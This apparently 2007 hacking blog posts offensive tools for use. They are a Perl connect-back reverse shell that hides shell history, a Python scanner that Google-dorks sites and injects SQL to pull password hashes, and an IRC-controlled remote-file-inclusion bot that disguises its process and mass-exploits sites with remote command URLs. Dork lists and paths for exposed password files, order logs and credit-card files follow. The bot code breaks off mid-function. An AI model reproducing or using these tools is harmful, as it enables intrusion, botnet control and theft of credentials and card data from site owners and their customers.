Nothing imPossible anything in this world

Sunday, November 11, 2007

[Perl] Connect Back Shell

#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

[python] SQL Scanner v1.0

#!/usr/bin/python
#SQL Scanner that will collect hosts using a google query. Will add the
#injection code to each host and search for md5 in the source.

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, time, socket, httplib

def title():
print "\n\t d3hydr8[at]gmail[dot]com SQL Scanner v1.0"
print "\t-----------------------------------------------"

def usage():
title()
print "\n Usage: python SQLscan.py \n"
print "\n Example: python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v\n"
print "\t[options]"
print "\t -g/-google : Searches google for hosts"
print "\t -s/-sql : Vuln. file plux sql injection"
print "\t -w/-write : Writes potential SQL found to file"
print "\t -v/-verbose : Verbose Mode\n"

def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text

def timer():
now = time.localtime(time.time())
return time.asctime(now)

def geturls(query):

counter = 10
urls = []
while counter < int(num):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls

def tester(victim):

if victim[:7] != "http://":
victim = "http://"+victim.rsplit("/",1)[0]+sql
if verbose ==1:
print "Testing:",victim
try:
source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
md5s = list(sets.Set(md5s))
print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:]
for md5 in md5s:
print "\t[",md5,"]\n"
found_sql.append(victim)
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass

if len(sys.argv) < 6:
usage()
sys.exit(1)

for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-s" or arg.lower() == "-sql":
sql = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-g" or arg.lower() == "-google":
query = sys.argv[int(sys.argv[1:].index(arg))+2]
num = sys.argv[int(sys.argv[1:].index(arg))+3]
title()
socket.setdefaulttimeout(10)
found_sql = []
count = 0
print "\n[+] SQL_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
if sql[:1] != "/":
sql = "/"+sql
print "[+] SQL:",sql
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
try:
if num.isdigit() == False:
print "\n[-] Argument [",num,"] must be a number.\n"
sys.exit(1)
else:
if int(num) <= 10:
print "\n[-] Argument [",num,"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",query)
print "[+] Query:",query
print "[+] Number:",num
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "[+] Scanning hosts..."
print "\n[-] Cancel: Press Ctrl-C"
for url in urls:
tester(url)
time.sleep(3)
print "-"*65
print "\n\n[+] Potential SQL found:",len(found_sql),"\n"
time.sleep(3)
if txt != None and len(found_sql) >=1:
sql_file = open(txt, "a")
sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n")
sql_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_sql:
count+=1
if txt != None:
sql_file.writelines("["+str(count)+"] "+k+"\n")
print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"

Saturday, November 10, 2007

[PERL] Inclusion Scanner

#!/usr/bin/perl -w

unlink("results.html");
print "\n \n#Will check a directory for all includes and unsets \n";
print "#Coded by Ironfist (ironsecurity.nl) \n";
print "#Usage: create a folder in your perlfolder and put the files to be scanned in it, next type the folder name below (eg myfolder) \n";
print "#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :) \n\n\n";

print "Directory to read? ";
$input = ;
chop ($input);

@files = <$input/*>;

foreach $file (@files) {
print "Checking: " .$file . "\n";

open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files2 = <$input/*/*>;
foreach $file (@files2) {
print "Checking: " .$file . "\n";

open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files3 = <$input/*/*/*>;
foreach $file (@files3) {
print "Checking: " .$file . "\n";

open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files4 = <$input/*/*/*/*>;
foreach $file (@files4) {
print "Checking: " .$file . "\n";

open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files5 = <$input/*/*/*/*/*>;
foreach $file (@files5) {
print "Checking: " .$file . "\n";

open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files6 = <$input/*/*/*/*/*/*>;
foreach $file (@files6) {
print "Checking: " .$file . "\n";

open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files7 = <$input/*/*/*/*/*/*/*>;
foreach $file (@files7) {
print "Checking: " .$file . "\n";

open(MYINPUTFILE, "$file");
while()
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}

print "Done! Check results.html for the found inclusions!";

RFI Bot - Scan created by PERL

#!/usr/bin/perl
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="http://geocities.com/alexlz_19/kewog.txt?"; #<---- Change this for your CMD
my $server="irc.server.org";
my $porta="6667";
my $nick="BOT-NAME";
my $chan="#channel";
###############END OF CONFIGURATION############

my $verbot = "2.0";
my $cmd="http://www.youthsoroca.md/php-nuke/foto/safe.jpg"; #Never change this
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan :1,0[7S1,0can-Bot] Scan is 3ON1 : 12!scan \r\n";

while($line = <$sk>){

$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}

if ($line=~ /PRIVMSG $chan :.deletebot/){
stampa($sk, "QUIT");
}

if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Started: $bug - Dork: $dork Engine: Google ");
stampa($sk, "PRIVMSG $chan :1,0[7G1,0oogle] Scanning now...");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $chan :1,0[7M1,0sn] Scanning now...");
my @mlist=&msn($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ltavista] Scanning now...");
my @alist=&altavista($dork);
stampa($sk, "PRIVMSG $chan :1,0[7L1,0ibero] Scanning now...");
my @llist=&libero($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0lltheweb] Scanning now...");
my @allist=&alltheweb($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0sk] Scanning now...");
my @asklist=&ask($dork);
stampa($sk, "PRIVMSG $chan :1,0[7U1,0ol] Scanning now...");
my @uollist=&uol($dork);
stampa($sk, "PRIVMSG $chan :1,0[7A1,0ol] Scanning now...");
my @aollist=&aol($dork);
push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Total results: ".scalar(@tot)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Cleaned results: ".scalar(@puliti)." Sites!");
stampa($sk, "PRIVMSG $chan :1,0[7S1,0can] Exploting started! ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug.$printcmd."?";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /31337/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe4OFF1] 1,0[7S1ys4 ".$type."1] 1,0[7F1ree4 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]4 $ker ");
checksafemode("$print");}}
elsif($re =~ /31337/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :1,0[7S1afe3ON1] 1,0[7S1ys3 ".$type."1] 1,0[7F1ree3 ".$space." 1] $print ");
stampa($sk, "PRIVMSG $chan :1,0[7I1nformation1]3 $ker ");
checksafemode("$print");}}
}}}
exit;
}}}

sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}

sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $space;
my $ker;
my $str;
while($Res=~m/
OSTYPE:(.+?)\
/g){
$type=$1;
}
while($Res=~m/
Kernel:(.+?)\
/g){
$ker=$1;
}
while($Res=~m/
Free:(.+?)\
/g){
$space=$1;
}
$str=$type.",".$space.",".$ker;
return $str;
}

sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/

Posted by Hydra at 9:39 PM No comments:

Finding PHP Vulnerabilities With Google Code Search

Dangerous keywords in Google Search :

it's keywords so dangerous...try it

Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS====================

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

/robots.txt
/admin.mdb
/shopping.mdb
/arg;
/stats/styles.css
/statshelp.htm
/favicon.ico
/stats/admin.mdb
/shopdbtest.asp
/cgi-bin/test.cgi
/cgi-bin/test.pl
/cgi-bin/env.cgi
/photos/protest/styles.css
http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
/cgi-bin/whereami.cgi
/shopping400.mdb
/cgi/test.cgi
/cgi-bin/test2.pl
/photos/protest/kingmarch_02.html
/chevy/index.htm
/cgi-bin/glocation.cgi
/cgi-bin/test2.cgi
/ccbill/glocation.cgi
/cgi-bin/styles.css
/shopping350.mdb
/cgi-bin/shopper.cgi
/shopadmin.asp
/news_2003-02-27.htm
/cgi-bin/whois.cgi
3 /cgi-bin/calendar.pl
3 /cgi-bin/calendar/calendar.pl
3 /cgibin/styles.css
3 /venem.htm
2 /stats/www.newbauersflowers.com/stats/04-refers.htm
2 /cgi-bin/where.pl
2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
2 /cgibin/recon.cgi
2 /cgibin/test.cgi
2 /WebShop/templates/styles.css
2 /stats/shopping350.mdb
2 /cgi-bin/mailform.cgi
2 /cgi-bin/recon.cgi
2 /chevy
2 /cgi-bin/servinfo.cgi
2 /acart2_0.mdb
2 /cgi-bin/where.cgi
2 /chevy/
2 /stats/www.savethemall.net/stats/19-refers.htm
2 /ccbill/secure/ccbill.log
2 /cgi/recon.cgi
2 /stats/www.gregoryflynn.com/chevy
2 /ibill/glocation.cgi
2 /ccbill/whereami.cgi
2 /ibill/whereami.cgi
2 /apps_trial.htm
2 /cgi-bin/lancelot/recon.cgi
2 /cgi-bin/DCShop/Orders/styles.css
1 /cgi-bin/htmanage.cgi
1 /stats/www.tysons.net/stats/05-refers.htm
1 /cgi-bin/mastergate/add.cgi
1 /cgi-bin/openjournal.cgi
1 /cgi-bin/calendar/calendar_admin.pl
1 /cgibin/ibill/count.cgi
1 /cgi-bin/nbmember2.cgi
1 /cgi-bin/mastergate/count.cgi
1 /cgi-bin/mastergate/accountcreate.cgi
1 /cgi-bin/ibill/accountcreate.cgi
1 /cgibin/MasterGate2/count.cgi
1 /cgi-bin/amadmin.pl
1 /cgibin/mailform.cgi
1 /cgibin/mastergate/count.cgi
1 /cgibin/harvestor.cgi
1 /cgibin/igate/count.cgi
1 /WebShop
1 /shopdisplaycategories.asp
1 /cgi-bin/DCShop/Orders/orders.txt
1 /cgi-bill/revshare/joinpage.cgi
1 /stats/www.gregoryflynn.com/stats/19-refers.htm
1 /cgi-local/DCShop/auth_data/styles.css
1 /cgi-bin/add-passwd.cgi
1 /cgi-bin/MasterGate/count.cgi
1 /apps_shop.htm%20/comersus/database/comersus.mdb
1 /data/verotellog.txt
1 /epwd/ws_ftp.log
1 /stats/www.dialacure.com/stats/16-refers.htm
1 /cgi/MasterGate2/count.cgi
1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
1 /wwii/styles.css
1 /cgi-bin/admin.mdb
1 /stats/www.gregoryflynn.com/stats/31-refers.htm
1 /cgi-bin/ibill-tools/count.cgi
1 /WebShop/templates/cc.txt
1 /cgibin/ibill/accountcreate.cgi
1 /cgi-bin/count.cgi
1 /cgi-local/DCShop/auth_data/auth_user_file.txt
1 /cgi/mastergate/count.cgi
1 /cgi-bin/EuroDebit/addusr.pl
1 /cgi-bin/dbm-passwd.cgi
1 /cgi/igate/accountcreate.cgi
1 /cgi-bin/store/Log_files/your_order.log
store/log_files/your_order.log
/cg i-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/ cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/---.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/or ders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/temp lates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id= id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/store/shopdbtest.asp
/log_files/yo ur_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgi bin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin /html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin /shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin /cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/---.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win /DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/store/commerce.cgi
/scripts/ shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/ cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin /Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin /store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/ page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin /pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin /admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin /admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/---.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/ cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/ authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/im port.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders. txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win /shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/ cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
/scripts/orders/orders.txt
/cgi-loca l/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/ shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
